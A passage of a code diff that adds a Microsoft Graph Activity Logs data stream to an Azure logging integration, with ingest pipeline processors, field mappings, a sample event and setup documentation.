rename-properties_is_billable + - convert: + field: azure.graphactivitylogs.properties.is_billable + type: boolean + tag: convert-properties_is_billable + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: azure.graphactivitylogs.properties.client_auth_method + type: integer + tag: convert-properties_client_auth_method + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: azure.graphactivitylogs.properties.time_generated + target_field: azure.graphactivitylogs.properties.time_generated + if: ctx.azure?.graphactivitylogs?.properties?.time_generated != null + tag: date-properties_time_generated + formats: + - ISO8601 + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - pipeline: + name: '{{ IngestPipeline "azure-shared-pipeline" }}' + tag: pipeline-azure-shared-pipeline + - fingerprint: + fields: + - azure.graphactivitylogs.properties.request_uri + - http.request.id + - azure.tenant_id + - azure.graphactivitylogs.properties.time_generated + target_field: _id + ignore_missing: true + tag: fingerprint-id + - set: + field: cloud.account.id + value: '{{azure.tenant_id}}' + tag: set-cloud_account_id + ignore_empty_value: true + - set: + field: cloud.region + value: '{{destination.geo.region_name}}' + tag: set-cloud_region + ignore_empty_value: true + - set: + field: cloud.service.name + value: 'Microsoft Graph' + tag: set-cloud_region + ignore_empty_value: true + - geoip: + field: client.ip + target_field: client.geo + ignore_missing: true + - geoip: + field: source.ip + target_field: source.geo + ignore_missing: true + # IP Autonomous System (AS) Lookup + - geoip: + database_file: GeoLite2-ASN.mmdb + field: source.ip + target_field: source.as + properties: + - asn + - organization_name + ignore_missing: true + - geoip: + database_file: GeoLite2-ASN.mmdb + field: client.ip + target_field: client.as + properties: + - asn + - organization_name + ignore_missing: true + - rename: + field: source.as.asn + target_field: source.as.number + ignore_missing: true + - rename: + field: source.as.organization_name + target_field: source.as.organization.name + ignore_missing: true + - rename: + field: client.as.asn + target_field: client.as.number + ignore_missing: true + - rename: + field: client.as.organization_name + target_field: client.as.organization.name + ignore_missing: true + - remove: + field: event.original + if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" + ignore_missing: true + tag: remove-event_original + - script: + tag: script_to_drop_null_values + lang: painless + description: Drops null/empty values recursively. + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + - set: + field: event.kind + value: pipeline_error + tag: set_pipeline_error + if: ctx.error?.message != null +on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.kind + value: pipeline_error diff --git a/packages/azure/data_stream/graphactivitylogs/fields/agent.yml b/packages/azure/data_stream/graphactivitylogs/fields/agent.yml new file mode 100644 index 00000000000..b1895d5577a --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/fields/agent.yml @@ -0,0 +1,62 @@ +- name: cloud.account.id + external: ecs +- name: cloud.availability_zone + external: ecs +- name: cloud.instance.id + external: ecs +- name: cloud.instance.name + external: ecs +- name: cloud.machine.type + external: ecs +- name: cloud.provider + external: ecs +- name: cloud.region + external: ecs +- name: cloud.project.id + external: ecs +- name: cloud.image.id + type: keyword + description: Image ID for the cloud instance. +- name: cloud.service.name + external: ecs +- name: container.id + external: ecs +- name: container.image.name + external: ecs +- name: container.labels + external: ecs +- name: container.name + external: ecs +- name: host.architecture + external: ecs +- name: host.domain + external: ecs +- name: host.hostname + external: ecs +- name: host.id + external: ecs +- name: host.mac + external: ecs +- name: host.name + external: ecs +- name: host.os.family + external: ecs +- name: host.os.kernel + external: ecs +- name: host.os.name + external: ecs +- name: host.os.platform + external: ecs +- name: host.os.version + external: ecs +- name: host.type + external: ecs +- name: host.containerized + type: boolean + description: If the host is a container. +- name: host.os.build + type: keyword + description: OS build information. +- name: host.os.codename + type: keyword + description: OS codename, if any. diff --git a/packages/azure/data_stream/graphactivitylogs/fields/base-fields.yml b/packages/azure/data_stream/graphactivitylogs/fields/base-fields.yml new file mode 100644 index 00000000000..41384c46aba --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/fields/base-fields.yml @@ -0,0 +1,20 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset name. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. +- name: event.module + type: constant_keyword + description: Event module + value: azure +- name: event.dataset + type: constant_keyword + description: Event dataset + value: azure.graphactivitylogs diff --git a/packages/azure/data_stream/graphactivitylogs/fields/ecs.yml b/packages/azure/data_stream/graphactivitylogs/fields/ecs.yml new file mode 100644 index 00000000000..b8b7c4f4bfa --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/fields/ecs.yml @@ -0,0 +1,114 @@ +- name: client.ip + external: ecs +- name: client.geo.city_name + external: ecs +- name: client.geo.continent_name + external: ecs +- name: client.geo.country_iso_code + external: ecs +- name: client.geo.country_name + external: ecs +- name: client.geo.location.lat + external: ecs +- name: client.geo.location.lon + external: ecs +- name: client.geo.region_iso_code + external: ecs +- name: client.geo.region_name + external: ecs +- name: client.user.id + external: ecs +- name: destination.geo.region_name + external: ecs +- name: ecs.version + external: ecs +- name: message + external: ecs +- name: event.action + external: ecs +- name: event.category + external: ecs +- name: event.created + external: ecs +- name: event.duration + external: ecs +- name: event.id + external: ecs +- name: event.ingested + external: ecs +- name: event.kind + external: ecs +- name: event.type + external: ecs +- name: http.request.id + external: ecs +- name: http.request.method + external: ecs +- name: http.response.bytes + external: ecs +- name: http.response.status_code + external: ecs +- name: log.level + external: ecs +- name: related.ip + external: ecs +- name: related.user + external: ecs +- name: source.address + external: ecs +- name: source.geo.city_name + external: ecs +- name: source.geo.continent_name + external: ecs +- name: source.geo.country_iso_code + external: ecs +- name: source.geo.country_name + external: ecs +- name: source.geo.location.lat + external: ecs +- name: source.geo.location.lon + external: ecs +- name: source.geo.region_iso_code + external: ecs +- name: source.geo.region_name + external: ecs +- name: source.ip + external: ecs +- name: url.domain + external: ecs +- name: url.password + external: ecs +- name: url.port + external: ecs +- name: url.username + external: ecs +- name: url.original + external: ecs +- name: url.path + external: ecs +- name: url.query + external: ecs +- name: url.extension + external: ecs +- name: url.scheme + external: ecs +- name: url.full + external: ecs +- name: user.id + external: ecs +- external: ecs + name: user_agent.device.name +- external: ecs + name: user_agent.name +- external: ecs + name: user_agent.original +- external: ecs + name: user_agent.os.full +- external: ecs + name: user_agent.os.name +- external: ecs + name: user_agent.os.version +- external: ecs + name: user_agent.version +- name: tags + external: ecs diff --git a/packages/azure/data_stream/graphactivitylogs/fields/fields.yml b/packages/azure/data_stream/graphactivitylogs/fields/fields.yml new file mode 100644 index 00000000000..31ff935bfdf --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/fields/fields.yml @@ -0,0 +1,104 @@ +- name: azure.graphactivitylogs + type: group + fields: + - name: category + type: keyword + description: | + Azure Event Category. For example, Graph Activity Logs has value `MicrosoftGraphActivityLogs`. + - name: operation_version + type: keyword + description: | + The Graph API version of the event. + - name: operation_name + type: keyword + description: | + Operation name. + - name: result_signature + type: keyword + description: | + Result signature. + - name: properties + type: group + description: | + Event properties. + fields: + - name: api_version + type: keyword + description: | + The API version of the event. + - name: app_id + type: keyword + description: | + The identifier for the application. + - name: at_content + type: keyword + description: | + Reserved for future use. + - name: billed_size + type: double + description: | + The record size in bytes. + - name: client_auth_method + type: integer + description: | + Indicates how the client was authenticated. For a public client, the value is 0. If client ID and client secret are used, the value is 1. If a client certificate was used for authentication, the value is 2. + - name: client_request_id + type: keyword + description: | + The client request identifier when sent. If no client request identifier is sent, the value will be equal to the operation identifier. + - name: identity_provider + type: keyword + description: | + The identity provider that authenticated the subject of the token. + - name: is_billable + type: boolean + description: | + Specifies whether ingesting the data is billable. When _IsBillable is false ingestion isn't billed to your Azure account. + - name: operation_id + type: keyword + description: | + The identifier for the batch. For non-batched requests, this will be unique per request. For batched requests, this will be the same for all requests in the batch. + - name: request_uri + type: keyword + description: | + The URI of the request. + - name: roles + type: keyword + description: | + The roles in token claims. + - name: scopes + type: keyword + description: | + The scopes in token claims. + - name: service_principal_id + type: keyword + description: | + The identifier of the servicePrincipal making the request. + - name: sign_in_activity_id + type: keyword + description: | + The identifier representing the sign-in activitys. + - name: source_system + type: keyword + description: | + The type of agent the event was collected by. For example, OpsManager for Windows agent, either direct connect or Operations Manager, Linux for all Linux agents, or Azure for Azure Diagnostics. + - name: time_generated + type: date + description: | + The date and time the request was received. + - name: token_issued_at + type: date + description: | + The timestamp the token was issued at. + - name: type + type: keyword + description: | + The name of the table. + - name: user_agent + type: keyword + description: | + The user agent information related to request. + - name: wids + type: keyword + description: | + Denotes the tenant-wide roles assigned to this user. diff --git a/packages/azure/data_stream/graphactivitylogs/fields/package-fields.yml b/packages/azure/data_stream/graphactivitylogs/fields/package-fields.yml new file mode 100644 index 00000000000..44792684f83 --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/fields/package-fields.yml @@ -0,0 +1,42 @@ +- name: azure + type: group + fields: + - name: subscription_id + type: keyword + description: | + Azure subscription ID. + - name: correlation_id + type: keyword + description: | + Correlation ID. + - name: tenant_id + type: keyword + description: | + tenant ID. + - name: resource + type: group + fields: + - name: id + type: keyword + description: | + Resource ID. + - name: group + type: keyword + description: | + Resource group. + - name: provider + type: keyword + description: | + Resource type/namespace. + - name: namespace + type: keyword + description: | + Resource type/namespace. + - name: name + type: keyword + description: | + Name. + - name: authorization_rule + type: keyword + description: | + Authorization rule. diff --git a/packages/azure/data_stream/graphactivitylogs/manifest.yml b/packages/azure/data_stream/graphactivitylogs/manifest.yml new file mode 100644 index 00000000000..28d5cef9066 --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/manifest.yml @@ -0,0 +1,62 @@ +type: logs +title: Microsoft Graph Activity Logs +streams: + - input: "azure-eventhub" + enabled: false + template_path: "azure-eventhub.yml.hbs" + title: "Microsoft Graph Activity Logs" + description: "Collect Microsoft Graph Activity Logs using azure-eventhub input" + vars: + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original` + type: bool + multi: false + default: false + - name: storage_account_container + type: text + title: Storage Account Container + multi: false + required: false + show_user: false + description: >- + The storage account container where the integration stores the checkpoint data for the consumer group. It is an advanced option to use with extreme care. You MUST use a dedicated storage account container for each Azure log type (activity, sign-in, audit logs, and others). DO NOT REUSE the same container name for more than one Azure log type. See [Container Names](https://docs.microsoft.com/en-us/rest/api/storageservices/naming-and-referencing-containers--blobs--and-metadata#container-names) for details on naming rules from Microsoft. The integration generates a default container name if not specified. + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - azure-graphactivitylogs + - forwarded + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: sanitize_newlines + type: bool + title: Sanitizes New Lines + description: Removes new lines in logs to ensure proper formatting of JSON data and avoid parsing issues during processing. + multi: false + required: false + show_user: false + default: false + - name: sanitize_singlequotes + required: true + show_user: false + title: Sanitizes Single Quotes + description: Replaces single quotes with double quotes (single quotes inside double quotes are omitted) in logs to ensure proper formatting of JSON data and avoid parsing issues during processing. + type: bool + multi: false + default: false +# Ensures agents have permissions to write data to `logs-*-*` +elasticsearch: + dynamic_dataset: true + dynamic_namespace: true diff --git a/packages/azure/data_stream/graphactivitylogs/sample_event.json b/packages/azure/data_stream/graphactivitylogs/sample_event.json new file mode 100644 index 00000000000..2f107010c19 --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/sample_event.json @@ -0,0 +1,131 @@ +{ + "@timestamp": "2024-03-07T10:24:44.793Z", + "azure": { + "correlation_id": "f7839da0-e7d1-4e4f-985a-64937fbge347", + "graphactivitylogs": { + "category": "MicrosoftGraphActivityLogs", + "operation_name": "Microsoft Graph Activity", + "operation_version": "v1.0", + "properties": { + "api_version": "v1.0", + "app_id": "a5a68e32-269a-3c91-a5e2-b9254e67hb29", + "client_auth_method": 2, + "client_request_id": "2fe58790-a848-4a93-9d2c-5645972aejk9", + "identity_provider": "https://sts.windows.net/ab30785b-417f-42a4-b5dc-8f9051718acb/", + "operation_id": "f7839da0-e7d1-4e4f-985a-64937fbge347", + "roles": [ + "Application.Read.All", + "Domain.Read.All", + "GroupMember.Read.All", + "LicenseAssignment.ReadWrite.All", + "Organization.Read.All", + "Policy.Read.ConditionalAccess", + "RoleManagement.Read.Directory", + "Team.ReadBasic.All", + "TeamsTab.Create", + "TeamsTab.Read.All", + "TeamsTab.ReadWrite.All", + "User.Read.All" + ], + "service_principal_id": "f2aq4c71-31e3-5065-91g3-4b2dfbsv50fg", + "sign_in_activity_id": "sign-in_ActivityId", + "time_generated": "2024-03-07T10:24:44.793Z", + "token_issued_at": "2024-03-07T10:19:44.000Z", + "wids": [ + "a207b4d3-0g8d-90cb-bhj5-d80n3121e69" + ] + }, + "result_signature": "200" + }, + "resource": { + "id": "/TENANTS/AB30785B-417F-42A4-B5DC-8F9051718ACB/PROVIDERS/MICROSOFT.AADIAM", + "provider": "MICROSOFT.AADIAM" + }, + "tenant_id": "ab30785b-417f-42a4-b5dc-8f9051718acb" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.143" + }, + "cloud": { + "account": { + "id": "ab30785b-417f-42a4-b5dc-8f9051718acb" + }, + "provider": "azure", + "region": "France Central", + "service": { + "name": "Microsoft Graph" + } + }, + "destination": { + "geo": { + "region_name": "France Central" + } + }, + "ecs": { + "version": "8.0.0" + }, + "event": { + "action": "Microsoft Graph Activity", + "duration": 1213372224, + "kind": "event", + "original": "{\"Level\":4,\"callerIpAddress\":\"81.2.69.143\",\"category\":\"MicrosoftGraphActivityLogs\",\"correlationId\":\"f7839da0-e7d1-4e4f-985a-64937fbge347\",\"durationMs\":1100725,\"location\":\"France Central\",\"operationName\":\"Microsoft Graph Activity\",\"operationVersion\":\"v1.0\",\"properties\":{\"apiVersion\":\"v1.0\",\"appId\":\"a5a68e32-269a-3c91-a5e2-b9254e67hb29\",\"atContent\":\"\",\"clientAuthMethod\":\"2\",\"clientRequestId\":\"2fe58790-a848-4a93-9d2c-5645972aejk9\",\"durationMs\":1100725,\"identityProvider\":\"https://sts.windows.net/ab30785b-417f-42a4-b5dc-8f9051718acb/\",\"ipAddress\":\"81.2.69.143\",\"location\":\"France Central\",\"operationId\":\"f7839da0-e7d1-4e4f-985a-64937fbge347\",\"requestId\":\"f7839da0-e7d1-4e4f-985a-64937fbge347\",\"requestMethod\":\"GET\",\"requestUri\":\"https://graph.microsoft.com/v1.0/directoryRoles\",\"responseSizeBytes\":4300,\"responseStatusCode\":200,\"roles\":\"Application.Read.All Domain.Read.All GroupMember.Read.All LicenseAssignment.ReadWrite.All Organization.Read.All Policy.Read.ConditionalAccess RoleManagement.Read.Directory Team.ReadBasic.All TeamsTab.Create TeamsTab.Read.All TeamsTab.ReadWrite.All User.Read.All\",\"scopes\":null,\"servicePrincipalId\":\"f2aq4c71-31e3-5065-91g3-4b2dfbsv50fg\",\"signInActivityId\":\"sign-in_ActivityId\",\"tenantId\":\"ab30785b-417f-42a4-b5dc-8f9051718acb\",\"timeGenerated\":\"2024-03-07T10:24:44.7939418Z\",\"tokenIssuedAt\":\"2024-03-07T10:19:44Z\",\"userAgent\":\"\",\"userId\":null,\"wids\":\"a207b4d3-0g8d-90cb-bhj5-d80n3121e69\"},\"resourceId\":\"/TENANTS/AB30785B-417F-42A4-B5DC-8F9051718ACB/PROVIDERS/MICROSOFT.AADIAM\",\"resultSignature\":\"200\",\"tenantId\":\"ab30785b-417f-42a4-b5dc-8f9051718acb\",\"time\":\"2024-03-07T10:24:44.7939418Z\"}", + "type": [ + "access" + ] + }, + "http": { + "request": { + "id": "f7839da0-e7d1-4e4f-985a-64937fbge347", + "method": "GET" + }, + "response": { + "bytes": 4300, + "status_code": 200 + } + }, + "log": { + "level": "4" + }, + "related": { + "ip": [ + "81.2.69.143" + ] + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.143" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "graph.microsoft.com", + "extension": "0/directoryRoles", + "original": "https://graph.microsoft.com/v1.0/directoryRoles", + "path": "/v1.0/directoryRoles", + "scheme": "https" + } +} \ No newline at end of file diff --git a/packages/azure/docs/README.md b/packages/azure/docs/README.md index 74a25217402..3c5d32d8c17 100644 --- a/packages/azure/docs/README.md +++ b/packages/azure/docs/README.md @@ -1,6 +1,6 @@ # Azure Logs Integration -The Azure Logs integration collects logs for specific Azure services like Azure Active Directory (Sign-in, Audit, Identity Protection, and Provisioning logs), Azure Spring Apps, Azure Firewall, and several others using the Activity and Platform logs. +The Azure Logs integration collects logs for specific Azure services like Azure Active Directory (Sign-in, Audit, Identity Protection, and Provisioning logs), Azure Spring Apps, Azure Firewall, Microsoft Graph Activity, and several others using the Activity and Platform logs. You can then visualize that data in Kibana, create alerts to notify you if something goes wrong, and reference data when troubleshooting an issue. @@ -16,7 +16,7 @@ fail to start due to an exceed quota limit. The Azure Logs integration collects logs. **Logs** help you keep a record of events that happen on your Azure account. -Log data streams collected by the Azure Logs integration include Activity, Platform, Active Directory (Sign-in, Audit, Identity Protection, Provisioning), and Spring Apps logs. +Log data streams collected by the Azure Logs integration include Activity, Platform, Active Directory (Sign-in, Audit, Identity Protection, Provisioning), Microsoft Graph Activity, and Spring Apps logs. ## Requirements @@ -266,6 +266,59 @@ The Elastic Agent can use one Storage account container for all integrations. The Agent will use the integration name and the event hub name to identify the blob to store the consumer group information uniquely. +### Running the integration behind a firewall + +When you run the Elastic Agent behind a firewall, to ensure proper communication with the necessary components, you need to allow traffic on port `5671` and `5672` for the Event Hub, and port `443` for the Storage Account container. + +```text +┌────────────────────────────────┐ ┌───────────────────┐ ┌───────────────────┐ +│ │ │ │ │ │ +│ ┌────────────┐ ┌───────────┐ │ │ ┌──────────────┐ │ │ ┌───────────────┐ │ +│ │ diagnostic │ │ event hub │ │ │ │azure-eventhub│ │ │ │ activity logs │ │ +│ │ setting │──▶│ │◀┼AMQP─│ <> │─┼──┼▶│<>│ │ +│ └────────────┘ └───────────┘ │ │ └──────────────┘ │ │ └───────────────┘ │ +│ │ │ │ │ │ │ +│ │ │ │ │ │ │ +│ │ │ │ │ │ │ +│ ┌─────────────┬─────HTTPS─┼──────────┘ │ │ │ +│ ┌───────┼─────────────┼──────┐ │ │ │ │ │ +│ │ │ │ │ │ │ │ │ │ +│ │ ▼ ▼ │ │ └─Agent─────────────┘ └─Elastic Cloud─────┘ +│ │ ┌──────────┐ ┌──────────┐ │ │ +│ │ │ 0 │ │ 1 │ │ │ +│ │ │ <> │ │ <> │ │ │ +│ │ └──────────┘ └──────────┘ │ │ +│ │ │ │ +│ │ │ │ +│ └─Storage Account Container──┘ │ +│ │ +│ │ +└─Azure──────────────────────────┘ +``` + +#### Event Hub + +Port `5671` and `5672` are commonly used for secure communication with the Event Hub. These ports are used to receive events. By allowing traffic on these ports, the Elastic Agent can establish a secure connection with the Event Hub. + +For more information, check the following documents: + +- [What ports do I need to open on the firewall?](https://learn.microsoft.com/en-us/azure/event-hubs/event-hubs-faq#what-ports-do-i-need-to-open-on-the-firewall) from the [Event Hubs frequently asked questions](https://learn.microsoft.com/en-us/azure/event-hubs/event-hubs-faq#what-ports-do-i-need-to-open-on-the-firewall). +- [AMQP outbound port requirements](https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-amqp-protocol-guide#amqp-outbound-port-requirements) + +#### Storage Account Container + +Port `443` is used for secure communication with the Storage Account container. This port is commonly used for HTTPS traffic. By allowing traffic on port 443, the Elastic Agent can securely access and interact with the Storage Account container, which is essential for storing and retrieving checkpoint data for each event hub partition. + +#### DNS + +Optionally, you can restrict the traffic to the following domain names: + +```text +*.servicebus.windows.net +*.blob.core.windows.net +*.cloudapp.net +``` + ## Settings Use the following settings to configure the Azure Logs integration when you add it to Fleet. diff --git a/packages/azure/docs/adlogs.md b/packages/azure/docs/adlogs.md index 361b323a64b..22aaf09b19a 100644 --- a/packages/azure/docs/adlogs.md +++ b/packages/azure/docs/adlogs.md @@ -999,7 +999,9 @@ An example event for `auditlogs` looks as following: | azure.auditlogs.operation_version | The operation version | keyword | | azure.auditlogs.properties.activity_datetime | Activity timestamp | date | | azure.auditlogs.properties.activity_display_name | Activity display name | keyword | +| azure.auditlogs.properties.additional_details.key | Additional details key | keyword | | azure.auditlogs.properties.additional_details.user_agent | User agent name. | keyword | +| azure.auditlogs.properties.additional_details.value | Additional details value | keyword | | azure.auditlogs.properties.authentication_protocol | Authentication protocol type. | keyword | | azure.auditlogs.properties.category | category | keyword | | azure.auditlogs.properties.correlation_id | Correlation ID | keyword | diff --git a/packages/azure/docs/eventhub.md b/packages/azure/docs/eventhub.md index 75ef37a725a..b4563e956ac 100644 --- a/packages/azure/docs/eventhub.md +++ b/packages/azure/docs/eventhub.md @@ -191,7 +191,7 @@ An example event for `eventhub` looks as following: | event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword | | event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | | event.created | event.created contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from @timestamp in that @timestamp typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, @timestamp should be used. | date | -| event.dataset | Event dataset | constant_keyword | +| event.dataset | Name of the dataset. If an event source publishes more than one type of log or events (e.g. access log, error log), the dataset is used to specify which one the event comes from. It's recommended but not required to start the dataset name with the module name, followed by a dot, then the dataset name. | keyword | | event.duration | Duration of the event in nanoseconds. If event.start and event.end are known this value should be the difference between the end and start time. | long | | event.id | Unique ID to describe the event. | keyword | | event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | diff --git a/packages/azure/docs/graphactivitylogs.md b/packages/azure/docs/graphactivitylogs.md new file mode 100644 index 00000000000..4f6d123ff0a --- /dev/null +++ b/packages/azure/docs/graphactivitylogs.md @@ -0,0 +1,353 @@ +# Microsoft Graph Activity Logs + +Microsoft Graph Activity Logs provide an audit trail of all HTTP requests that the Microsoft Graph service has received and processed for a tenant. Microsoft Graph Activity Logs gives full visibility into all transactions made by applications and other API clients that you have consented to in the tenant. Refer to [Microsoft Graph Activity Common Usecases](https://learn.microsoft.com/en-us/graph/microsoft-graph-activity-logs-overview#common-use-cases-for-microsoft-graph-activity-logs) for more use cases. + +Tenant administrators can configure the collection and storage destinations of Microsoft Graph Activity Logs through Diagnostic Setting in the Entra Portal. This integration uses Azure Event Hubs destination to stream Microsoft Graph Activity Logs to Elastic. + +## Requirements and Setup + +### Prerequisites + +Following privileges are required to collect Microsoft Graph Activity Logs: +- A Microsoft Entra ID P1 or P2 tenant license in your tenant. +- A `Security Administrator` or `Global Administrator` Microsoft Entra ID role to configure the diagnostic settings. +Refer to [Microsoft Graph Prerequisites](https://learn.microsoft.com/en-us/graph/microsoft-graph-activity-logs-overview#prerequisites) for more information on required privileges. + +### Setup + +Refer to the [Azure Logs](https://docs.elastic.co/integrations/azure) page for more information about setting up and using this integration. + +### Limitations + +- Activities of multi-tenant applications belonging to another tenant are not available. +- In few rare cases, events might take up to 2 hours to be delivered to Event Hubs. +Refer to [Microsoft Graph Activity Limitations](https://learn.microsoft.com/en-us/graph/microsoft-graph-activity-logs-overview#limitations) for more information. + +## Settings + +`eventhub` : + _string_ +It is a fully managed, real-time data ingestion service. Elastic recommends using only letters, numbers, and the hyphen (-) character for Event Hub names to maximize compatibility. You _can_ use existing Event Hubs having underscores (_) in the Event Hub name; in this case, the integration will replace underscores with hyphens (-) when it uses the Event Hub name to create dependent Azure resources behind the scenes (e.g., the storage account container to store Event Hub consumer offsets). Elastic also recommends using a separate event hub for each log type as the field mappings of each log type differ. +Default value `insights-operational-logs`. + +`consumer_group` : +_string_ + The publish/subscribe mechanism of Event Hubs is enabled through consumer groups. A consumer group is a view (state, position, or offset) of an entire event hub. Consumer groups enable multiple consuming applications to each have a separate view of the event stream, and to read the stream independently at their own pace and with their own offsets. +Default value: `$Default` + +`connection_string` : +_string_ +The connection string required to communicate with Event Hubs, steps [here](https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-get-connection-string). + +A Blob Storage account is required in order to store/retrieve/update the offset or state of the eventhub messages. This means that after stopping the filebeat azure module it can start back up at the spot that it stopped processing messages. + +`storage_account` : +_string_ +The name of the storage account the state/offsets will be stored and updated. + +`storage_account_key` : +_string_ +The storage account key, this key will be used to authorize access to data in your storage account. + +`storage_account_container` : +_string_ +The storage account container where the integration stores the checkpoint data for the consumer group. It is an advanced option to use with extreme care. You MUST use a dedicated storage account container for each Azure log type (activity, sign-in, audit logs, and others). DO NOT REUSE the same container name for more than one Azure log type. See [Container Names](https://docs.microsoft.com/en-us/rest/api/storageservices/naming-and-referencing-containers--blobs--and-metadata#container-names) for details on naming rules from Microsoft. The integration generates a default container name if not specified. + +`resource_manager_endpoint` : +_string_ +Optional, by default we are using the azure public environment, to override, users can provide a specific resource manager endpoint in order to use a different Azure environment. + +Resource manager endpoints: + +```text +# Azure ChinaCloud +https://management.chinacloudapi.cn/ + +# Azure GermanCloud +https://management.microsoftazure.de/ + +# Azure PublicCloud +https://management.azure.com/ + +# Azure USGovernmentCloud +https://management.usgovcloudapi.net/ +``` + +## Logs + +### graphactivitylogs + +The `graphactivitylogs` data stream of the Azure Logs package will collect Microsoft Graph activity events that have been streamed through an azure event hub. + +An example event for `graphactivitylogs` looks as following: + +```json +{ + "@timestamp": "2024-03-07T10:24:44.793Z", + "azure": { + "correlation_id": "f7839da0-e7d1-4e4f-985a-64937fbge347", + "graphactivitylogs": { + "category": "MicrosoftGraphActivityLogs", + "operation_name": "Microsoft Graph Activity", + "operation_version": "v1.0", + "properties": { + "api_version": "v1.0", + "app_id": "a5a68e32-269a-3c91-a5e2-b9254e67hb29", + "client_auth_method": 2, + "client_request_id": "2fe58790-a848-4a93-9d2c-5645972aejk9", + "identity_provider": "https://sts.windows.net/ab30785b-417f-42a4-b5dc-8f9051718acb/", + "operation_id": "f7839da0-e7d1-4e4f-985a-64937fbge347", + "roles": [ + "Application.Read.All", + "Domain.Read.All", + "GroupMember.Read.All", + "LicenseAssignment.ReadWrite.All", + "Organization.Read.All", + "Policy.Read.ConditionalAccess", + "RoleManagement.Read.Directory", + "Team.ReadBasic.All", + "TeamsTab.Create", + "TeamsTab.Read.All", + "TeamsTab.ReadWrite.All", + "User.Read.All" + ], + "service_principal_id": "f2aq4c71-31e3-5065-91g3-4b2dfbsv50fg", + "sign_in_activity_id": "sign-in_ActivityId", + "time_generated": "2024-03-07T10:24:44.793Z", + "token_issued_at": "2024-03-07T10:19:44.000Z", + "wids": [ + "a207b4d3-0g8d-90cb-bhj5-d80n3121e69" + ] + }, + "result_signature": "200" + }, + "resource": { + "id": "/TENANTS/AB30785B-417F-42A4-B5DC-8F9051718ACB/PROVIDERS/MICROSOFT.AADIAM", + "provider": "MICROSOFT.AADIAM" + }, + "tenant_id": "ab30785b-417f-42a4-b5dc-8f9051718acb" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.143" + }, + "cloud": { + "account": { + "id": "ab30785b-417f-42a4-b5dc-8f9051718acb" + }, + "provider": "azure", + "region": "France Central", + "service": { + "name": "Microsoft Graph" + } + }, + "destination": { + "geo": { + "region_name": "France Central" + } + }, + "ecs": { + "version": "8.0.0" + }, + "event": { + "action": "Microsoft Graph Activity", + "duration": 1213372224, + "kind": "event", + "original": 